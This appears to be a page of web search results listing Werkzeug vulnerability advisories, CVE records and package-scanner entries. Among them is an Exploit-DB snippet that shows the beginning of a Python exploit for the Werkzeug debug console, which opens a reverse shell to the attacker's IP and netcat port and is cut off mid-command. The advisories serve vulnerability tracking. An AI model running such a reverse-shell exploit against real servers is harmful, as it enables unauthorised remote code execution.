🌐
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
Werkzeug 2.0.3 vulnerabilities | Snyk
Learn more about known Werkzeug 2.0.3 vulnerabilities and licenses detected.
🌐
MITRE CVE
cve.mitre.org › cgi-bin › cvekey.cgi
Cve
Common vulnerabilities and Exposures (CVE) · We're sorry but the CVE Website doesn't work properly without JavaScript enabled. Please enable it to continue
🌐
Snyk
security.snyk.io › snyk vulnerability database › pip
werkzeug | Snyk
A good and healthy external contribution signal for Werkzeug project, which invites more than one hundred open source maintainers to collaborate on the repository. ... Known vulnerabilities in the werkzeug package.
🌐
NIST
nvd.nist.gov › vuln › detail › cve-2024-34069
CVE-2024-34069 Detail - NVD
This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States
🌐
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - Vulnerable App: #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
🌐
Safety
getsafety.com › packages › pypi › werkzeug
Werkzeug (PyPI) — Safety Package & Vulnerability Database
The comprehensive WSGI web application library · Known vulnerabilities and security issues detected in the extension's dependencies and code
🌐
IBM
ibm.com › support › pages › security-bulletin-cookie-parsing-vulnerability-werkzeug-allows-subdomain-cookie-injection-≤-v222-affects-watsonxdata
Security Bulletin: Cookie Parsing Vulnerability in Werkzeug Allows Subdomain Cookie Injection (≤ v2.2.2), affects watsonx.data
April 8, 2026 - Werkzeug prior to 2.2.3 will parse ... using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key. The issue is fixed in Werkzeug 2.2.3. CWE: CWE-20: Improper Input Validation CVSS Source: IBM X-Force CVSS Base score: 2.6 CVSS Vector: ...
🌐
Veracode
sourceclear.com › vulnerability-database › security › directory-traversal › python › sid-20917
Directory Traversal Vulnerability in the werkzeug library | Veracode
werkzeug (werkzeug). werkzeug is vulnerable to directory traversal. An attacker is able to access arbitrary files through the SharedDataMiddleware due to the way Python's `os.path.join()` function works on Windows.
Find elsewhere
🌐
Snyk
security.snyk.io › snyk vulnerability database › pip › werkzeug
werkzeug 2.3.3 | Snyk
Security vulnerabilities and package health score for pip package werkzeug 2.3.3
🌐
Netapp
security.netapp.com › advisory › ntap-20240614-0004
CVE-2024-34069 Werkzeug Vulnerability in NetApp Products
June 14, 2024 - NetApp is an industry leader in developing and implementing product security standards. Learn how we can help you maintain the confidentiality, integrity, and availability of your data.
🌐
Vulmon
vulmon.com › home › search results
werkzeug vulnerabilities and exploits
Browsers may allow "nameless" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Hos... ... Werkzeug is a comprehensive WSGI web application library.
🌐
GitHub
github.com › weka › Chaos_Lab_Web › issues › 15
werkzeug-3.1.3-py3-none-any.whl: 2 vulnerabilities (highest severity is: 5.3) · Issue #15 · weka/Chaos_Lab_Web
November 30, 2025 - Library home page: https://files.pythonhosted.org/packages/52/24/ab44c871b0f07f491e5d2ad12c9bd7358e527510618cb1b803a88e986db1/werkzeug-3.1.3-py3-none-any.whl ... Path to vulnerable library: /tmp/ws-ua_20251126134238_BIMKRN/python_CHGREC/202511261343001/env/lib/python3.9/site-packages/werkzeug-3.1.3.dist-info,/tmp/ws-ua_20251126134238_BIMKRN/python_CHGREC/202511261343001/env/lib/python3.9/site-packages/werkzeug-3.1.3.dist-info
Author   weka
🌐
CVE Details
cvedetails.com › vulnerability-list › vendor_id-17201 › product_id-41301 › Palletsprojects-Werkzeug.html
Palletsprojects Werkzeug : Security vulnerabilities, CVEs
February 3, 2018 - The issue is fixed in Werkzeug 2.2.3. Source: GitHub, Inc. ... Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body.
🌐
GitHub
github.com › microsoft › cascadia-code › issues › 649
There is a vulnerability in Werkzeug 2.0.1,upgrade recommended · Issue #649 · microsoft/cascadia-code
August 31, 2022 - cascadia-code/requirements.txt Line 198 in 017bde5 werkzeug==2.0.1 CVE-2022-29361 Recommended upgrade version:2.1.1
Author   microsoft
🌐
Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
June 28, 2015 - Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... With curated Threat Intelligence, you can see which vulnerabilities ...
🌐
CVE
cve.org › CVERecord › SearchResults
Werkzeug
Common vulnerabilities and Exposures (CVE) · We're sorry but the CVE Website doesn't work properly without JavaScript enabled. Please enable it to continue
🌐
OpenCVE
app.opencve.io › cve
Werkzeug CVEs and Security Vulnerabilities - OpenCVE
CVEs in KEV CVEs with EPSS >= 80% Crit. Microsoft High Apache SQL Injection (CWE-89) Linux Kernel High (CVSS 3.1) Apache Struts RCE (Remote Code Execution) XSS (CWE-79) Critical (CVSS 4.0) CVEs to check